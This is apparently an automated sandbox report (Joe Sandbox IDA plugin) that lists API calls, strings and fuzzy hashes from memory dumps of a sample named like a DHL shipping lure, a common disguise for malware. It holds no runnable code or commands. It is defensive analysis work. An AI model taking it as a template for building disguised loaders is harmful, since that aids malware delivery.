                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconLoad
                                                                                            • String ID: blank$info$question$stop$warning
                                                                                            • API String ID: 2457776203-404129466
                                                                                            • Opcode ID: 9c4caba27f6e18d7bf6217517af892468035d21de95da7cc4be2c02b62d4a4cf
                                                                                            • Instruction ID: 1efdcc37d6aca7b6c3fd97cea52776be5c436ded0eb9403f3f79af7d31c06249
                                                                                            • Opcode Fuzzy Hash: 9c4caba27f6e18d7bf6217517af892468035d21de95da7cc4be2c02b62d4a4cf
                                                                                            • Instruction Fuzzy Hash: 0A110D3168970BBAE701BB659C83DAA6B9CFF15368B20017BF500E6382F7745E405379
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$LocalTime
                                                                                            • String ID:
                                                                                            • API String ID: 952045576-0
                                                                                            • Opcode ID: 1085ce8f5f63c57eb63599e9a0cd34b7f6618b3425e5a1feb98097f35c750ee0
                                                                                            • Instruction ID: eeb313571f986f4b89af632027853d8e0eab49d6e3109b0a4d6d71af16e6d0d5
                                                                                            • Opcode Fuzzy Hash: 1085ce8f5f63c57eb63599e9a0cd34b7f6618b3425e5a1feb98097f35c750ee0
                                                                                            • Instruction Fuzzy Hash: 82414E65C1022C76CB11FBF8888AACFBBA8FF45710F508566E518E3121FB74E655C3A6
                                                                                            APIs
                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0087682C,00000004,00000000,00000000), ref: 0083F953
                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0087682C,00000004,00000000,00000000), ref: 0087F3D1
                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0087682C,00000004,00000000,00000000), ref: 0087F454
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1268545403-0
                                                                                            • Opcode ID: e3887ba696f60cca2a3116e7c7afe295d8cd59e004824e4f8e1d1ab9a4032687
                                                                                            • Instruction ID: 0cbce81d641118e7a4dda32a9149629e52d17cad58cf38e5e5b9d4ed13f0bfed
                                                                                            • Opcode Fuzzy Hash: e3887ba696f60cca2a3116e7c7afe295d8cd59e004824e4f8e1d1ab9a4032687
                                                                                            • Instruction Fuzzy Hash: 5441B631A08640BAC7359B2DC88876A7F91FBD6324F14853CEA4BD6667C675E880CBD1
                                                                                            APIs
                                                                                            • DeleteObject.GDI32(00000000), ref: 008B2D1B
                                                                                            • GetDC.USER32(00000000), ref: 008B2D23
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008B2D2E
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 008B2D3A
                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008B2D76
                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008B2D87
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008B5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 008B2DC2
                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008B2DE1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3864802216-0
                                                                                            • Opcode ID: bee11937f5ba09380e997c70bdfd59585e4f2c64e2da510cd3fd6b2057bababc
                                                                                            • Instruction ID: be6ae0ca4f2e3a7de4194d9358538fe52566bb12b5bd6f6fa20e89d02f0ecae4
                                                                                            • Opcode Fuzzy Hash: bee11937f5ba09380e997c70bdfd59585e4f2c64e2da510cd3fd6b2057bababc
                                                                                            • Instruction Fuzzy Hash: 50318972201214BBEB218F54CC8AFEB3BA9FF4A711F084155FE08DA291C6B59C51CBA4
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 2931989736-0
                                                                                            • Opcode ID: 4425f360d03fda970a96b0eac293d0c351f8e49cd00cca68aa068b306daeba35
                                                                                            • Instruction ID: 5ea651fa243032cb0ae5a189c071d4b179f37e20e03f3d459108cbdcb5dfe18c
                                                                                            • Opcode Fuzzy Hash: 4425f360d03fda970a96b0eac293d0c351f8e49cd00cca68aa068b306daeba35
                                                                                            • Instruction Fuzzy Hash: C7219571690A1D77D614B924CD92FFA235CFF30398B444020FE15DA782F729ED5187A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                            • API String ID: 0-572801152
                                                                                            • Opcode ID: 9c92163075c3e0de771026d82272214deca83384a4fdf0772d80eadd7cca05a0
                                                                                            • Instruction ID: c86ea6d0cb829377cc85fe50f434a0aac96a2ff265dd4df9757fce70efed1609
                                                                                            • Opcode Fuzzy Hash: 9c92163075c3e0de771026d82272214deca83384a4fdf0772d80eadd7cca05a0
                                                                                            • Instruction Fuzzy Hash: C8D1A171A0060AAFEF10CFA8C881BAEB7B5FF49344F148469E915EB681E771DD85CB50
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,008617FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 008615CE
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00861651
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,008617FB,?,008617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008616E4
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008616FB
                                                                                              • Part of subcall function 00853820: RtlAllocateHeap.NTDLL(00000000,?,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6,?,00821129), ref: 00853852
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,008617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00861777
                                                                                            • __freea.LIBCMT ref: 008617A2
                                                                                            • __freea.LIBCMT ref: 008617AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                            • String ID:
                                                                                            • API String ID: 2829977744-0
                                                                                            • Opcode ID: 7c5b495a1f56e346b217af44ebb26baa539c9502a9632100957a70a27d4a4c00
                                                                                            • Instruction ID: 03ca15f8ca943e454cce71cd650c5e4f29d92c4ec625c389ab634164de7c98c0
                                                                                            • Opcode Fuzzy Hash: 7c5b495a1f56e346b217af44ebb26baa539c9502a9632100957a70a27d4a4c00
                                                                                            • Instruction Fuzzy Hash: 3F91D471E0021A9ADF208E74CC89AEEBBB5FF49314F1E4659E902E7152DB35CD44CBA1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit
                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                            • API String ID: 2610073882-625585964
                                                                                            • Opcode ID: 836d7879b011138dce538661c552758c788c3fb0218196201735b32bd718e4d2
                                                                                            • Instruction ID: a704e46b348eed5808d7035ce61e38ace37eb8947223f02b11e5ba71d9849007
                                                                                            • Opcode Fuzzy Hash: 836d7879b011138dce538661c552758c788c3fb0218196201735b32bd718e4d2
                                                                                            • Instruction Fuzzy Hash: CC91AF71A00219ABEF20CFA5C844FAEBBB8FF86714F108559F515EB281D7B09945CFA0
                                                                                            APIs
                                                                                            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0089125C
                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00891284
                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008912A8
                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008912D8
                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0089135F
                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008913C4
                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00891430
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                            • String ID:
                                                                                            • API String ID: 2550207440-0
                                                                                            • Opcode ID: b5c861164054d9fe44a3d7c6a25424f76bdc032c3eec08f993d2f505204e771a
                                                                                            • Instruction ID: 36608cc0cb89e31c96921e25022f741c527299c550a7c5bd3a02f06e9a48b499
                                                                                            • Opcode Fuzzy Hash: b5c861164054d9fe44a3d7c6a25424f76bdc032c3eec08f993d2f505204e771a
                                                                                            • Instruction Fuzzy Hash: FF91E475A0421AAFDF00EF98C889BBEB7B5FF44315F184429E900EB291D774A941CB95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                            • String ID:
                                                                                            • API String ID: 3225163088-0
                                                                                            • Opcode ID: a1188e2551bb6682262e81a8b0f09c0ee74751b066fb9e934d8dc6c09c0d8a5a
                                                                                            • Instruction ID: 0c5b36295960ccf9bf6bb49202d7a8e6f84be85412f529ae4cd8433c9aa65f6e
                                                                                            • Opcode Fuzzy Hash: a1188e2551bb6682262e81a8b0f09c0ee74751b066fb9e934d8dc6c09c0d8a5a
                                                                                            • Instruction Fuzzy Hash: 04911571D00219EFCB11CFA9C884AEEBBB8FF89320F148559E555F7251D774A982CBA0
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 008A396B
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 008A3A7A
                                                                                            • _wcslen.LIBCMT ref: 008A3A8A
                                                                                            • VariantClear.OLEAUT32(?), ref: 008A3C1F
                                                                                              • Part of subcall function 00890CDF: VariantInit.OLEAUT32(00000000), ref: 00890D1F
                                                                                              • Part of subcall function 00890CDF: VariantCopy.OLEAUT32(?,?), ref: 00890D28
                                                                                              • Part of subcall function 00890CDF: VariantClear.OLEAUT32(?), ref: 00890D34
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                            • API String ID: 4137639002-1221869570
                                                                                            • Opcode ID: 102cff6aaa65ec5158ecc53faf56e3869968775748eb3eab8409105cc9820b64
                                                                                            • Instruction ID: 51f24235abbbaf5516c9b082918c7b9fd6606cc8fe7d41bdb1ce7a7be1672d74
                                                                                            • Opcode Fuzzy Hash: 102cff6aaa65ec5158ecc53faf56e3869968775748eb3eab8409105cc9820b64
                                                                                            • Instruction Fuzzy Hash: 059124756083159FD704EF28C48096AB7E5FF8A314F14892DF889DB351DB31EA46CB92
                                                                                            APIs
                                                                                              • Part of subcall function 0088000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?,?,0088035E), ref: 0088002B
                                                                                              • Part of subcall function 0088000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?), ref: 00880046
                                                                                              • Part of subcall function 0088000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?), ref: 00880054
                                                                                              • Part of subcall function 0088000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?), ref: 00880064
                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 008A4C51
                                                                                            • _wcslen.LIBCMT ref: 008A4D59
                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 008A4DCF
                                                                                            • CoTaskMemFree.OLE32(?), ref: 008A4DDA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                            • String ID: NULL Pointer assignment
                                                                                            • API String ID: 614568839-2785691316
                                                                                            • Opcode ID: 51eba62ff0e10ada73f97e2c39d9511fa12e5fa4b36766cf48ac8ec612963507
                                                                                            • Instruction ID: 9c72d846e59dd2812650e5d88f29044bd65cab5172ed5d2a99e0609476abbad5
                                                                                            • Opcode Fuzzy Hash: 51eba62ff0e10ada73f97e2c39d9511fa12e5fa4b36766cf48ac8ec612963507
                                                                                            • Instruction Fuzzy Hash: 0F912671D0022DAFEF14DFA8D880AEEBBB8FF49314F104169E915E7251EB709A548F61
                                                                                            APIs
                                                                                            • GetMenu.USER32(?), ref: 008B2183
                                                                                            • GetMenuItemCount.USER32(00000000), ref: 008B21B5
                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008B21DD
                                                                                            • _wcslen.LIBCMT ref: 008B2213
                                                                                            • GetMenuItemID.USER32(?,?), ref: 008B224D
                                                                                            • GetSubMenu.USER32(?,?), ref: 008B225B
                                                                                              • Part of subcall function 00883A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00883A57
                                                                                              • Part of subcall function 00883A3D: GetCurrentThreadId.KERNEL32 ref: 00883A5E
                                                                                              • Part of subcall function 00883A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008825B3), ref: 00883A65
                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008B22E3
                                                                                              • Part of subcall function 0088E97B: Sleep.KERNEL32 ref: 0088E9F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 4196846111-0
                                                                                            • Opcode ID: a45cf9cf2ce60a40fc293d378b975a21f6883134dcdac4f97101548186d0e784
                                                                                            • Instruction ID: 25058599fe848f8c97c548e6902013c6a919dfe090c62574e19af6fd0a5285b3
                                                                                            • Opcode Fuzzy Hash: a45cf9cf2ce60a40fc293d378b975a21f6883134dcdac4f97101548186d0e784
                                                                                            • Instruction Fuzzy Hash: 59716D75A00215AFCB10EF68C885AEEBBF5FF88310F148459E916EB351DB34EE418B91
                                                                                            APIs
                                                                                            • IsWindow.USER32(00B381D8), ref: 008B7F37
                                                                                            • IsWindowEnabled.USER32(00B381D8), ref: 008B7F43
                                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 008B801E
                                                                                            • SendMessageW.USER32(00B381D8,000000B0,?,?), ref: 008B8051
                                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 008B8089
                                                                                            • GetWindowLongW.USER32(00B381D8,000000EC), ref: 008B80AB
                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008B80C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                            • String ID:
                                                                                            • API String ID: 4072528602-0
                                                                                            • Opcode ID: 07018c1d7c361b1cd2d10fc84943fb0929171775edf787f53a208428218f4c2c
                                                                                            • Instruction ID: e9e2597cc7cc9743371f0b46e2dd14044e87bfec815eb8d07cb840d8a7b33469
                                                                                            • Opcode Fuzzy Hash: 07018c1d7c361b1cd2d10fc84943fb0929171775edf787f53a208428218f4c2c
                                                                                            • Instruction Fuzzy Hash: 51718834A09604EFEB20AF64C884FFABBB9FF99340F140459E955D73A1CB31A845CB24
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 0088AEF9
                                                                                            • GetKeyboardState.USER32(?), ref: 0088AF0E
                                                                                            • SetKeyboardState.USER32(?), ref: 0088AF6F
                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0088AF9D
                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0088AFBC
                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 0088AFFD
                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0088B020
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                            • String ID:
                                                                                            • API String ID: 87235514-0
                                                                                            • Opcode ID: e89020897a81ec8bf8e4239da43ba6ac5c884f43d32a8901692559821d5e6d13
                                                                                            • Instruction ID: 2e0a1f8b7ef2f1a6c7b0102e40210fe50c8a61140bf01fd11fe16c7f19dda707
                                                                                            • Opcode Fuzzy Hash: e89020897a81ec8bf8e4239da43ba6ac5c884f43d32a8901692559821d5e6d13
                                                                                            • Instruction Fuzzy Hash: BB5115A06047D53DFB3A62348C45BBABFE9BB46304F08858AE2E5D54C2D7D8ACC4D752
                                                                                            APIs
                                                                                            • GetParent.USER32(00000000), ref: 0088AD19
                                                                                            • GetKeyboardState.USER32(?), ref: 0088AD2E
                                                                                            • SetKeyboardState.USER32(?), ref: 0088AD8F
                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0088ADBB
                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0088ADD8
                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0088AE17
                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0088AE38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
